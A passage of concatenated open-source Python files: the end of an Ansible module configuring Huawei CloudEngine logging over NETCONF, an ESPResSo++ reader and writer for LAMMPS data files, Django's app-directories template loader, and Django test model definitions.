self.updates_cmd.append("undo info-center logbuffer")
if self.log_buff_size:
if self.state == "present" and self.log_dict.get("bufferSize") != self.log_buff_size:
xml_str += '<bufferSize>%s</bufferSize>' % self.log_buff_size
self.updates_cmd.append(
"info-center logbuffer size %s" % self.log_buff_size)
elif self.state == "absent" and self.log_dict.get("bufferSize") == self.log_buff_size:
xml_str += '<bufferSize>512</bufferSize>'
self.updates_cmd.append("undo info-center logbuffer size")
if xml_str == '<globalParam operation="merge">':
return ""
else:
xml_str += '</globalParam>'
return xml_str
def config_log_soruce(self):
"""config info-center sources"""
xml_str = ''
if not self.module_name or not self.channel_id:
return xml_str
source = self.log_dict["source"]
if self.state == "present":
xml_str = '<icSources><icSource operation="merge">'
cmd = 'info-center source %s channel %s log' % (
self.module_name, self.channel_id)
else:
if not source or self.module_name != source.get("moduleName").lower() or \
self.channel_id != source.get("icChannelId"):
return ''
if self.log_enable == 'no_use' and not self.log_level:
xml_str = '<icSources><icSource operation="delete">'
else:
xml_str = '<icSources><icSource operation="merge">'
cmd = 'undo info-center source %s channel %s log' % (
self.module_name, self.channel_id)
xml_str += '<moduleName>%s</moduleName><icChannelId>%s</icChannelId>' % (
self.module_name, self.channel_id)
# log_enable
if self.log_enable != 'no_use':
if self.state == "present" and (not source or self.log_enable != source.get("logEnFlg")):
xml_str += '<logEnFlg>%s</logEnFlg>' % self.log_enable
if self.log_enable == "true":
cmd += ' state on'
else:
cmd += ' state off'
elif self.state == "absent" and source and self.log_level == source.get("logEnLevel"):
xml_str += '<logEnFlg>%s</logEnFlg>' % CHANNEL_DEFAULT_LOG_STATE.get(self.channel_id)
cmd += ' state'
# log_level
if self.log_level:
if self.state == "present" and (not source or self.log_level != source.get("logEnLevel")):
xml_str += '<logEnLevel>%s</logEnLevel>' % self.log_level
cmd += ' level %s' % self.log_level
elif self.state == "absent" and source and self.log_level == source.get("logEnLevel"):
xml_str += '<logEnLevel>%s</logEnLevel>' % CHANNEL_DEFAULT_LOG_LEVEL.get(self.channel_id)
cmd += ' level'
if xml_str.endswith("</icChannelId>"):
if self.log_enable == 'no_use' and not self.log_level and self.state == "absent":
xml_str += '</icSource></icSources>'
self.updates_cmd.append(cmd)
return xml_str
else:
return ''
else:
xml_str += '</icSource></icSources>'
self.updates_cmd.append(cmd)
return xml_str
def netconf_load_config(self, xml_str):
"""load log config by netconf"""
if not xml_str:
return
xml_cfg = """
<config>
<syslog xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
%s
</syslog>
</config>""" % xml_str
recv_xml = set_nc_config(self.module, xml_cfg)
self.check_response(recv_xml, "SET_LOG")
self.changed = True
def check_params(self):
"""Check all input params"""
# check log_buff_size ranges from 0 to 10240
if self.log_buff_size:
if not self.log_buff_size.isdigit():
self.module.fail_json(
msg="Error: log_buff_size is not digit.")
if int(self.log_buff_size) < 0 or int(self.log_buff_size) > 10240:
self.module.fail_json(
msg="Error: log_buff_size is not ranges from 0 to 10240.")
# check channel_id ranging from 0 to 9
if self.channel_id:
if not self.channel_id.isdigit():
self.module.fail_json(msg="Error: channel_id is not digit.")
if int(self.channel_id) < 0 or int(self.channel_id) > 9:
self.module.fail_json(
msg="Error: channel_id is not ranges from 0 to 9.")
# module_name and channel_id must be set at the same time
if bool(self.module_name) != bool(self.channel_id):
self.module.fail_json(
msg="Error: module_name and channel_id must be set at the same time.")
def get_proposed(self):
"""get proposed info"""
if self.log_time_stamp:
self.proposed["log_time_stamp"] = self.log_time_stamp
if self.log_buff_enable != 'no_use':
self.proposed["log_buff_enable"] = self.log_buff_enable
if self.log_buff_size:
self.proposed["log_buff_size"] = self.log_buff_size
if self.module_name:
self.proposed["module_name"] = self.module_name
if self.channel_id:
self.proposed["channel_id"] = self.channel_id
if self.log_enable != 'no_use':
self.proposed["log_enable"] = self.log_enable
if self.log_level:
self.proposed["log_level"] = self.log_level
self.proposed["state"] = self.state
def get_existing(self):
"""get existing info"""
if not self.log_dict:
return
if self.log_time_stamp:
self.existing["log_time_stamp"] = self.log_dict.get("logTimeStamp").lower()
if self.log_buff_enable != 'no_use':
self.existing["log_buff_enable"] = self.log_dict.get("icLogBuffEn")
if self.log_buff_size:
self.existing["log_buff_size"] = self.log_dict.get("bufferSize")
if self.module_name:
self.existing["source"] = self.log_dict.get("source")
def get_end_state(self):
"""get end state info"""
log_dict = self.get_log_dict()
if not log_dict:
return
if self.log_time_stamp:
self.end_state["log_time_stamp"] = log_dict.get("logTimeStamp").lower()
if self.log_buff_enable != 'no_use':
self.end_state["log_buff_enable"] = log_dict.get("icLogBuffEn")
if self.log_buff_size:
self.end_state["log_buff_size"] = log_dict.get("bufferSize")
if self.module_name:
self.end_state["source"] = log_dict.get("source")
def work(self):
"""worker"""
self.check_params()
self.log_dict = self.get_log_dict()
self.get_existing()
self.get_proposed()
# deal present or absent
xml_str = ''
if self.log_time_stamp or self.log_buff_enable != 'no_use' or self.log_buff_size:
xml_str += self.config_log_global()
if self.module_name:
xml_str += self.config_log_soruce()
if xml_str:
self.netconf_load_config(xml_str)
self.changed = True
self.get_end_state()
self.results['changed'] = self.changed
self.results['proposed'] = self.proposed
self.results['existing'] = self.existing
self.results['end_state'] = self.end_state
if self.changed:
self.results['updates'] = self.updates_cmd
else:
self.results['updates'] = list()
self.module.exit_json(**self.results)
def main():
"""Module main"""
argument_spec = dict(
log_time_stamp=dict(required=False, type='str',
choices=['date_boot', 'date_second', 'date_tenthsecond', 'date_millisecond',
'shortdate_second', 'shortdate_tenthsecond', 'shortdate_millisecond',
'formatdate_second', 'formatdate_tenthsecond', 'formatdate_millisecond']),
log_buff_enable=dict(type='str', default='no_use', choices=['no_use', 'true', 'false']),
log_buff_size=dict(required=False, type='str'),
module_name=dict(required=False, type='str'),
channel_id=dict(required=False, type='str'),
log_enable=dict(type='str', default='no_use', choices=['no_use', 'true', 'false']),
log_level=dict(required=False, type='str',
choices=['emergencies', 'alert', 'critical', 'error',
'warning', 'notification', 'informational', 'debugging']),
state=dict(required=False, default='present',
choices=['present', 'absent'])
)
argument_spec.update(ce_argument_spec)
module = InfoCenterLog(argument_spec)
module.work()
if __name__ == '__main__':
main()
| gpl-3.0 |
kkreis/espressopp | src/tools/lammps.py | 7 | 16178 | # Copyright (C) 2012,2013
# Max Planck Institute for Polymer Research
# Copyright (C) 2008,2009,2010,2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
**************************
lammps - read lammps files
**************************
This Python module allows one to use a LAMMPS data file as the
input to an ESPResSo++ simulation.
"""
import espressopp
def read(fin):
f = open(fin)
line = f.readline() # comment line
while not 'atoms' in line: #skip possible blank line
line = f.readline()
num_particles = int(line.split()[0])
num_bonds = int(f.readline().split()[0])
num_angles = int(f.readline().split()[0])
num_dihedrals = int(f.readline().split()[0])
line = f.readline() # impropers
line = f.readline() # blank line
line = f.readline() # atom types and maybe the word "velocities"
num_types = int(line.split()[0])
velocities = True if 'velocities' in line else False #TODO fix this? why should there be the velocity keyword?
# find and store size of box
line = ''
while not 'xlo' in line:
line = f.readline()
xmin, xmax = map(float, line.split()[0:2])
ymin, ymax = map(float, f.readline().split()[0:2])
zmin, zmax = map(float, f.readline().split()[0:2])
Lx = xmax - xmin
Ly = ymax - ymin
Lz = zmax - zmin
# find and store coordinates
line = ''
while not 'Atoms' in line:
line = f.readline()
line = f.readline()
if(num_types == 1):
rstart = 3
if(num_bonds == 0): rstart = 2
x = []
y = []
z = []
for i in xrange(num_particles):
rx, ry, rz = map(float, f.readline().split()[rstart:])
x.append(rx)
y.append(ry)
z.append(rz)
else:
p_type = []
q = []
x = []
y = []
z = []
for i in xrange(num_particles):
k, rq, rx, ry, rz = map(float, f.readline().split()[2:])
p_type.append(int(k))
q.append(rq)
x.append(rx)
y.append(ry)
z.append(rz)
if(num_bonds != 0):
# find and store bonds
line = ''
while not 'Bonds' in line:
line = f.readline()
line = f.readline()
bonds = []
for i in xrange(num_bonds):
bond_id, bond_type, pid1, pid2 = map(int, f.readline().split())
bonds.append((pid1, pid2))
if(num_angles != 0):
# find and store angles
line = ''
while not 'Angles' in line:
line = f.readline()
line = f.readline()
angles = []
for i in xrange(num_angles):
angle_id, angle_type, pid1, pid2, pid3 = map(int, f.readline().split())
angles.append((pid1, pid2, pid3))
if(num_dihedrals != 0):
# find and store angles
line = ''
while not 'Dihedrals' in line:
line = f.readline()
line = f.readline()
dihedrals = []
for i in xrange(num_dihedrals):
dihedral_id, dihedral_type, pid1, pid2, pid3, pid4 = map(int, f.readline().split())
dihedrals.append((pid1, pid2, pid3, pid4))
if(velocities):
# find and store velocities
line = ''
while not 'Velocities' in line:
line = f.readline()
line = f.readline() # blank line
vx = []
vy = []
vz = []
for i in xrange(num_particles):
vx_, vy_, vz_ = map(float, f.readline().split()[1:])
vx.append(vx_)
vy.append(vy_)
vz.append(vz_)
f.close()
if(num_types != 1):
return p_type, bonds, angles, q, x, y, z, Lx, Ly, Lz
if(num_bonds == 0 and num_angles == 0 and num_dihedrals == 0 and not velocities):
return x, y, z, Lx, Ly, Lz
if(num_bonds == 0 and num_angles == 0 and num_dihedrals == 0 and velocities):
return x, y, z, Lx, Ly, Lz, vx, vy, vz
elif(num_bonds != 0 and num_angles == 0 and num_dihedrals == 0):
return bonds, x, y, z, Lx, Ly, Lz
elif(num_bonds != 0 and num_angles != 0 and num_dihedrals == 0):
return bonds, angles, x, y, z, Lx, Ly, Lz
else:
return bonds, angles, dihedrals, x, y, z, Lx, Ly, Lz
def read_charmm(fin):
f = open(fin)
line = f.readline() # comment line
while not 'atoms' in line: #skip possible blank line
line = f.readline()
num_particles = int(line.split()[0])
num_bonds = int(f.readline().split()[0])
num_angles = int(f.readline().split()[0])
num_dihedrals = int(f.readline().split()[0])
num_impropers = int(f.readline().split()[0])
line = f.readline() # blank line
line = f.readline() # atom types
num_types = int(line.split()[0])
line = f.readline() # bond types
num_bond_types = int(line.split()[0])
line = f.readline() # angle types
num_angle_types = int(line.split()[0])
line = f.readline() # dihedral types
num_dihedral_types = int(line.split()[0])
line = f.readline() # impropers types
num_improper_types = int(line.split()[0])
velocities = True if 'velocities' in line else False #TODO fix this? why should there be the velocity keyword?
# find and store size of box
line = ''
while not 'xlo' in line:
line = f.readline()
xmin, xmax = map(float, line.split()[0:2])
ymin, ymax = map(float, f.readline().split()[0:2])
zmin, zmax = map(float, f.readline().split()[0:2])
Lx = xmax - xmin
Ly = ymax - ymin
Lz = zmax - zmin
#find and store masses
line = ''
while not 'Masses' in line:
line = f.readline()
line = f.readline()
masses = []
dumm = 0.0
masses.append(dumm)
for i in xrange(num_types):
rmass = float(f.readline().split()[1])
masses.append(rmass)
#find and store LJ param
line = ''
while not 'Pair Coeffs' in line:
line = f.readline()
line = f.readline()
epsilon = []
sigma = []
dumm = 0.0
epsilon.append(dumm)
sigma.append(dumm)
for i in xrange(num_types):
repsilon, rsigma = map(float, f.readline().split()[1:3])
epsilon.append(repsilon)
sigma.append(rsigma)
# find and store coordinates
line = ''
while not 'Atoms' in line:
line = f.readline()
line = f.readline()
if(num_types == 1):
rstart = 3
if(num_bonds == 0): rstart = 2
p_type = []
q = []
x = []
y = []
z = []
for i in xrange(num_particles):
rx, ry, rz = map(float,f.readline().split()[rstart:])
x.append(rx)
y.append(ry)
z.append(rz)
else:
p_type = []
q = []
x = []
y = []
z = []
for i in xrange(num_particles):
k, rq, rx, ry, rz = map(float, f.readline().split()[2:])
p_type.append(int(k))
q.append(rq)
x.append(rx)
y.append(ry)
z.append(rz)
if(num_bonds != 0):
# find and store bond coeff
line = ''
while not 'Bond Coeffs' in line:
line = f.readline()
line = f.readline()
K = []
r0 = []
dumm = 0.0
K.append(dumm)
r0.append(dumm)
for i in xrange(num_bond_types):
rK, rr0 = map(float, f.readline().split()[1:3])
K.append(rK)
r0.append(rr0)
if(num_bonds != 0):
# find and store bonds
line = ''
while not 'Bonds' in line:
line = f.readline()
line = f.readline()
bonds = []
bonds_type_arr = []
for i in xrange(num_bonds):
bond_id, bond_type, pid1, pid2 = map(int, f.readline().split())
bonds.append((pid1, pid2))
bonds_type_arr.append(bond_type)
if(num_angles != 0):
# find and store angle coeff
line = ''
while not 'Angle Coeffs' in line:
line = f.readline()
line = f.readline()
Kt = []
t0 = []
dumm = 0.0
Kt.append(dumm)
t0.append(dumm)
for i in xrange(num_bond_types):
rKt, rt0 = map(float, f.readline().split()[1:3])
Kt.append(rKt)
t0.append(rt0)
if(num_angles != 0):
# find and store angles
line = ''
while not 'Angles' in line:
line = f.readline()
line = f.readline()
angles = []
angles_type_arr = []
for i in xrange(num_angles):
angle_id, angle_type, pid1, pid2, pid3 = map(int, f.readline().split())
angles.append((pid1, pid2, pid3))
angles_type_arr.append(angle_type)
if(num_dihedrals != 0):
# find and store dihedrals coeff
line = ''
while not 'Dihedral Coeffs' in line:
line = f.readline()
line = f.readline()
Kdh = []
ndh = []
ph0 = []
dumm = 0.0
Kdh.append(dumm)
ndh.append(dumm)
ph0.append(dumm)
for i in xrange(num_bond_types):
rKdh, rndh, rph0 = map(float, f.readline().split()[1:4])
Kdh.append(rKdh)
ndh.append(rndh)
ph0.append(rph0)
if(num_dihedrals != 0):
# find and store dihedrals
line = ''
while not 'Dihedrals' in line:
line = f.readline()
line = f.readline()
dihedrals = []
dihedrals_type_arr = []
for i in xrange(num_dihedrals):
dihedral_id, dihedral_type, pid1, pid2, pid3, pid4 = map(int, f.readline().split())
dihedrals.append((pid1, pid2, pid3, pid4))
dihedrals_type_arr.append(dihedral_type)
if(velocities):
# find and store velocities
line = ''
while not 'Velocities' in line:
line = f.readline()
line = f.readline() # blank line
vx = []
vy = []
vz = []
for i in xrange(num_particles):
vx_, vy_, vz_ = map(float, f.readline().split()[1:])
vx.append(vx_)
vy.append(vy_)
vz.append(vz_)
f.close()
if(num_bonds == 0 and num_angles == 0 and num_dihedrals == 0 and not velocities):
return p_type, masses, epsilon, sigma, q, x, y, z, Lx, Ly, Lz
if(num_bonds == 0 and num_angles == 0 and num_dihedrals == 0 and velocities):
return p_type, masses, epsilon, sigma, q, x, y, z, Lx, Ly, Lz, vx, vy, vz
if(num_bonds != 0 and num_angles == 0 and num_dihedrals == 0 and not velocities):
return p_type, masses, epsilon, sigma, K, r0, bonds, bonds_type_arr, q, x, y, z, Lx, Ly, Lz
if(num_bonds != 0 and num_angles == 0 and num_dihedrals == 0 and velocities):
return p_type, masses, epsilon, sigma, K, r0, bonds, bonds_type_arr, q, x, y, z, Lx, Ly, Lz, vx, vy, vz
if(num_bonds != 0 and num_angles != 0 and num_dihedrals == 0 and not velocities):
return p_type, masses, epsilon, sigma, K, r0, bonds, bonds_type_arr, Kt, t0, angles, angles_type_arr, q, x, y, z, Lx, Ly, Lz
if(num_bonds != 0 and num_angles != 0 and num_dihedrals == 0 and velocities):
return p_type, masses, epsilon, sigma, K, r0, bonds, bonds_type_arr, Kt, t0, angles, angles_type_arr, q, x, y, z, Lx, Ly, Lz, vx, vy, vz
if(num_bonds != 0 and num_angles != 0 and num_dihedrals != 0 and not velocities):
return p_type, masses, epsilon, sigma, K, r0, bonds, bonds_type_arr, Kt, t0, angles, angles_type_arr, Kdh, ndh, ph0, dihedrals, dihedrals_type_arr, q, x, y, z, Lx, Ly, Lz
if(num_bonds != 0 and num_angles != 0 and num_dihedrals != 0 and velocities):
return p_type, masses, epsilon, sigma, K, r0, bonds, bonds_type_arr, Kt, t0, angles, angles_type_arr, Kdh, ndh, ph0, dihedrals, dihedrals_type_arr, q, x, y, z, Lx, Ly, Lz, vx, vy, vz
def write(fout, system, writeVelocities=False):
# first collect all the information that we need to write into the file
numParticles = int(espressopp.analysis.NPart(system).compute())
box_x = system.bc.boxL[0]
box_y = system.bc.boxL[1]
box_z = system.bc.boxL[2]
bonds = []
nbondtypes = 0
angles = []
nangletypes = 0
dihedrals = []
ndihedraltypes = 0
nInteractions = system.getNumberOfInteractions()
for i in xrange(nInteractions):
bT = system.getInteraction(i).bondType()
if bT == espressopp.interaction.Pair:
nbondtypes += 1
bl = system.getInteraction(i).getFixedPairList().getBonds()
bln = []
for j in xrange(len(bl)):
bln.extend(bl[j])
bonds.append(bln)
elif bT == espressopp.interaction.Angular:
nangletypes += 1
an = system.getInteraction(i).getFixedTripleList().getTriples()
ann = []
for j in xrange(len(an)):
ann.extend(an[j])
angles.append(ann)
elif bT == espressopp.interaction.Dihedral:
ndihedraltypes += 1
di = system.getInteraction(i).getFixedQuadrupleList().getQuadruples()
din = []
for j in xrange(len(di)):
din.extend(di[j])
dihedrals.append(din)
nbonds = 0
for i in xrange(len(bonds)):
nbonds += len(bonds[i])
nangles = 0
for i in xrange(len(angles)):
nangles += len(angles[i])
ndihedrals = 0
for i in xrange(len(dihedrals)):
ndihedrals += len(dihedrals[i])
atomtypes = []
maxParticleID = int(espressopp.analysis.MaxPID(system).compute())
pid = 0
while pid <= maxParticleID:
if system.storage.particleExists(pid):
particle = system.storage.getParticle(pid)
type = particle.type
if type in atomtypes:
pid += 1
else:
atomtypes.append(type)
pid += 1
else:
pid += 1
natomtypes = len(atomtypes)
# now we can write the file
file = open(fout,'w')
file.write('LAMMPS\n\n')
file.write('%5d atoms\n' % numParticles)
file.write('%5d bonds\n' % nbonds)
file.write('%5d angles\n' % nangles)
file.write('%5d dihedrals\n' % ndihedrals)
#impropers are not supported yet
file.write('%5d impropers\n\n' % 0)
file.write('%5d atom types\n' % natomtypes)
file.write('%5d bond types\n' % nbondtypes)
file.write('%5d angle types\n' % nangletypes)
file.write('%5d dihedral types\n' % ndihedraltypes)
file.write('%5d improper types\n\n' % 0)
file.write('%.4f %.4f xlo xhi\n' % (0.0, box_x))
file.write('%.4f %.4f ylo yhi\n' % (0.0, box_y))
file.write('%.4f %.4f zlo zhi\n' % (0.0, box_z))
file.write('\nAtoms\n\n');
pid = 0
while pid <= maxParticleID:
if system.storage.particleExists(pid):
particle = system.storage.getParticle(pid)
p = system.bc.getUnfoldedPosition(particle.pos, particle.imageBox)
xpos = p[0]
ypos = p[1]
zpos = p[2]
type = particle.type
# we don't support molecule tags yet
molecule_tag = (pid-1) / 200 + 1
st = "%d %d %d %.3f %.3f %.3f\n"%(pid, molecule_tag, type+1, xpos, ypos, zpos)
file.write(st)
pid += 1
else:
pid += 1
if writeVelocities:
file.write('\nVelocities\n\n');
pid = 0
while pid <= maxParticleID:
if system.storage.particleExists(pid):
particle = system.storage.getParticle(pid)
xvel = particle.v[0]
yvel = particle.v[1]
zvel = particle.v[2]
st = "%d %15.10f %15.10f %15.10f\n"%(pid, xvel, yvel, zvel)
file.write(st)
pid += 1
else:
pid += 1
if nbonds > 0:
file.write('\nBonds\n\n')
bn = 1
for i in xrange(len(bonds)):
for j in xrange(len(bonds[i])):
file.write('%d %d %d %d\n' % (bn, i+1, bonds[i][j][0], bonds[i][j][1]))
bn += 1
if nangles > 0:
file.write('\nAngles\n\n')
an = 1
for i in xrange(len(angles)):
for j in xrange(len(angles[i])):
file.write('%d %d %d %d %d\n' % (an, i+1, angles[i][j][1], angles[i][j][0], angles[i][j][2]))
an += 1
if ndihedrals > 0:
file.write('\nDihedrals\n\n')
dn = 1
for i in xrange(len(dihedrals)):
for j in xrange(len(dihedrals[i])):
file.write('%d %d %d %d %d %d\n' % (dn, i+1, dihedrals[i][j][0], dihedrals[i][j][1], dihedrals[i][j][2], dihedrals[i][j][3]))
dn += 1
file.close()
| gpl-3.0 |
atruberg/django-custom | django/template/loaders/app_directories.py | 105 | 2354 | """
Wrapper for loading templates from "templates" directories in INSTALLED_APPS
packages.
"""
import os
import sys
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.template.base import TemplateDoesNotExist
from django.template.loader import BaseLoader
from django.utils._os import safe_join
from django.utils.importlib import import_module
from django.utils import six
# At compile time, cache the directories to search.
if six.PY2:
fs_encoding = sys.getfilesystemencoding() or sys.getdefaultencoding()
app_template_dirs = []
for app in settings.INSTALLED_APPS:
try:
mod = import_module(app)
except ImportError as e:
raise ImproperlyConfigured('ImportError %s: %s' % (app, e.args[0]))
template_dir = os.path.join(os.path.dirname(mod.__file__), 'templates')
if os.path.isdir(template_dir):
if six.PY2:
template_dir = template_dir.decode(fs_encoding)
app_template_dirs.append(template_dir)
# It won't change, so convert it to a tuple to save memory.
app_template_dirs = tuple(app_template_dirs)
class Loader(BaseLoader):
is_usable = True
def get_template_sources(self, template_name, template_dirs=None):
"""
Returns the absolute paths to "template_name", when appended to each
directory in "template_dirs". Any paths that don't lie inside one of the
template dirs are excluded from the result set, for security reasons.
"""
if not template_dirs:
template_dirs = app_template_dirs
for template_dir in template_dirs:
try:
yield safe_join(template_dir, template_name)
except UnicodeDecodeError:
# The template dir name was a bytestring that wasn't valid UTF-8.
raise
except ValueError:
# The joined path was located outside of template_dir.
pass
def load_template_source(self, template_name, template_dirs=None):
for filepath in self.get_template_sources(template_name, template_dirs):
try:
with open(filepath, 'rb') as fp:
return (fp.read().decode(settings.FILE_CHARSET), filepath)
except IOError:
pass
raise TemplateDoesNotExist(template_name)
| bsd-3-clause |
fenginx/django | tests/model_fields/models.py | 12 | 12373 | import os
import tempfile
import uuid
from django.contrib.contenttypes.fields import (
GenericForeignKey, GenericRelation,
)
from django.contrib.contenttypes.models import ContentType
from django.core.files.storage import FileSystemStorage
from django.db import models
from django.db.models.fields.files import ImageField, ImageFieldFile
from django.db.models.fields.related import (
ForeignKey, ForeignObject, ManyToManyField, OneToOneField,
)
from django.utils.translation import gettext_lazy as _
try:
from PIL import Image
except ImportError:
Image = None
class Foo(models.Model):
a = models.CharField(max_length=10)
d = models.DecimalField(max_digits=5, decimal_places=3)
def get_foo():
return Foo.objects.get(id=1).pk
class Bar(models.Model):
b = models.CharField(max_length=10)
a = models.ForeignKey(Foo, models.CASCADE, default=get_foo, related_name='bars')
class Whiz(models.Model):
CHOICES = (
('Group 1', (
(1, 'First'),
(2, 'Second'),
)
),
('Group 2', (
(3, 'Third'),
(4, 'Fourth'),
)
),
(0, 'Other'),
(5, _('translated')),
)
c = models.IntegerField(choices=CHOICES, null=True)
class WhizDelayed(models.Model):
c = models.IntegerField(choices=(), null=True)
# Contrived way of adding choices later.
WhizDelayed._meta.get_field('c').choices = Whiz.CHOICES
class WhizIter(models.Model):
c = models.IntegerField(choices=iter(Whiz.CHOICES), null=True)
class WhizIterEmpty(models.Model):
c = models.CharField(choices=iter(()), blank=True, max_length=1)
class Choiceful(models.Model):
no_choices = models.IntegerField(null=True)
empty_choices = models.IntegerField(choices=(), null=True)
with_choices = models.IntegerField(choices=[(1, 'A')], null=True)
empty_choices_bool = models.BooleanField(choices=())
empty_choices_text = models.TextField(choices=())
class BigD(models.Model):
d = models.DecimalField(max_digits=32, decimal_places=30)
class FloatModel(models.Model):
size = models.FloatField()
class BigS(models.Model):
s = models.SlugField(max_length=255)
class UnicodeSlugField(models.Model):
s = models.SlugField(max_length=255, allow_unicode=True)
class SmallIntegerModel(models.Model):
value = models.SmallIntegerField()
class IntegerModel(models.Model):
value = models.IntegerField()
class BigIntegerModel(models.Model):
value = models.BigIntegerField()
null_value = models.BigIntegerField(null=True, blank=True)
class PositiveSmallIntegerModel(models.Model):
value = models.PositiveSmallIntegerField()
class PositiveIntegerModel(models.Model):
value = models.PositiveIntegerField()
class Post(models.Model):
title = models.CharField(max_length=100)
body = models.TextField()
class NullBooleanModel(models.Model):
nbfield = models.BooleanField(null=True, blank=True)
nbfield_old = models.NullBooleanField()
class BooleanModel(models.Model):
bfield = models.BooleanField()
string = models.CharField(max_length=10, default='abc')
class DateTimeModel(models.Model):
d = models.DateField()
dt = models.DateTimeField()
t = models.TimeField()
class DurationModel(models.Model):
field = models.DurationField()
class NullDurationModel(models.Model):
field = models.DurationField(null=True)
class PrimaryKeyCharModel(models.Model):
string = models.CharField(max_length=10, primary_key=True)
class FksToBooleans(models.Model):
"""Model with FKs to models with {Null,}BooleanField's, #15040"""
bf = models.ForeignKey(BooleanModel, models.CASCADE)
nbf = models.ForeignKey(NullBooleanModel, models.CASCADE)
class FkToChar(models.Model):
"""Model with FK to a model with a CharField primary key, #19299"""
out = models.ForeignKey(PrimaryKeyCharModel, models.CASCADE)
class RenamedField(models.Model):
modelname = models.IntegerField(name="fieldname", choices=((1, 'One'),))
class VerboseNameField(models.Model):
id = models.AutoField("verbose pk", primary_key=True)
field1 = models.BigIntegerField("verbose field1")
field2 = models.BooleanField("verbose field2", default=False)
field3 = models.CharField("verbose field3", max_length=10)
field4 = models.DateField("verbose field4")
field5 = models.DateTimeField("verbose field5")
field6 = models.DecimalField("verbose field6", max_digits=6, decimal_places=1)
field7 = models.EmailField("verbose field7")
field8 = models.FileField("verbose field8", upload_to="unused")
field9 = models.FilePathField("verbose field9")
field10 = models.FloatField("verbose field10")
# Don't want to depend on Pillow in this test
# field_image = models.ImageField("verbose field")
field11 = models.IntegerField("verbose field11")
field12 = models.GenericIPAddressField("verbose field12", protocol="ipv4")
field13 = models.NullBooleanField("verbose field13")
field14 = models.PositiveIntegerField("verbose field14")
field15 = models.PositiveSmallIntegerField("verbose field15")
field16 = models.SlugField("verbose field16")
field17 = models.SmallIntegerField("verbose field17")
field18 = models.TextField("verbose field18")
field19 = models.TimeField("verbose field19")
field20 = models.URLField("verbose field20")
field21 = models.UUIDField("verbose field21")
field22 = models.DurationField("verbose field22")
class GenericIPAddress(models.Model):
ip = models.GenericIPAddressField(null=True, protocol='ipv4')
###############################################################################
# These models aren't used in any test, just here to ensure they validate
# successfully.
# See ticket #16570.
class DecimalLessThanOne(models.Model):
d = models.DecimalField(max_digits=3, decimal_places=3)
# See ticket #18389.
class FieldClassAttributeModel(models.Model):
field_class = models.CharField
###############################################################################
class DataModel(models.Model):
short_data = models.BinaryField(max_length=10, default=b'\x08')
data = models.BinaryField()
###############################################################################
# FileField
class Document(models.Model):
myfile = models.FileField(upload_to='unused', unique=True)
###############################################################################
# ImageField
# If Pillow available, do these tests.
if Image:
class TestImageFieldFile(ImageFieldFile):
"""
Custom Field File class that records whether or not the underlying file
was opened.
"""
def __init__(self, *args, **kwargs):
self.was_opened = False
super().__init__(*args, **kwargs)
def open(self):
self.was_opened = True
super().open()
class TestImageField(ImageField):
attr_class = TestImageFieldFile
# Set up a temp directory for file storage.
temp_storage_dir = tempfile.mkdtemp()
temp_storage = FileSystemStorage(temp_storage_dir)
temp_upload_to_dir = os.path.join(temp_storage.location, 'tests')
class Person(models.Model):
"""
Model that defines an ImageField with no dimension fields.
"""
name = models.CharField(max_length=50)
mugshot = TestImageField(storage=temp_storage, upload_to='tests')
class AbstractPersonWithHeight(models.Model):
"""
Abstract model that defines an ImageField with only one dimension field
to make sure the dimension update is correctly run on concrete subclass
instance post-initialization.
"""
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height')
mugshot_height = models.PositiveSmallIntegerField()
class Meta:
abstract = True
class PersonWithHeight(AbstractPersonWithHeight):
"""
Concrete model that subclass an abstract one with only on dimension
field.
"""
name = models.CharField(max_length=50)
class PersonWithHeightAndWidth(models.Model):
"""
Model that defines height and width fields after the ImageField.
"""
name = models.CharField(max_length=50)
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
class PersonDimensionsFirst(models.Model):
"""
Model that defines height and width fields before the ImageField.
"""
name = models.CharField(max_length=50)
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
class PersonTwoImages(models.Model):
"""
Model that:
* Defines two ImageFields
* Defines the height/width fields before the ImageFields
* Has a nullable ImageField
"""
name = models.CharField(max_length=50)
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
headshot_height = models.PositiveSmallIntegerField(
blank=True, null=True)
headshot_width = models.PositiveSmallIntegerField(
blank=True, null=True)
headshot = TestImageField(blank=True, null=True,
storage=temp_storage, upload_to='tests',
height_field='headshot_height',
width_field='headshot_width')
class AllFieldsModel(models.Model):
big_integer = models.BigIntegerField()
binary = models.BinaryField()
boolean = models.BooleanField(default=False)
char = models.CharField(max_length=10)
date = models.DateField()
datetime = models.DateTimeField()
decimal = models.DecimalField(decimal_places=2, max_digits=2)
duration = models.DurationField()
email = models.EmailField()
file_path = models.FilePathField()
floatf = models.FloatField()
integer = models.IntegerField()
generic_ip = models.GenericIPAddressField()
null_boolean = models.NullBooleanField()
positive_integer = models.PositiveIntegerField()
positive_small_integer = models.PositiveSmallIntegerField()
slug = models.SlugField()
small_integer = models.SmallIntegerField()
text = models.TextField()
time = models.TimeField()
url = models.URLField()
uuid = models.UUIDField()
fo = ForeignObject(
'self',
on_delete=models.CASCADE,
from_fields=['positive_integer'],
to_fields=['id'],
related_name='reverse'
)
fk = ForeignKey(
'self',
models.CASCADE,
related_name='reverse2'
)
m2m = ManyToManyField('self')
oto = OneToOneField('self', models.CASCADE)
object_id = models.PositiveIntegerField()
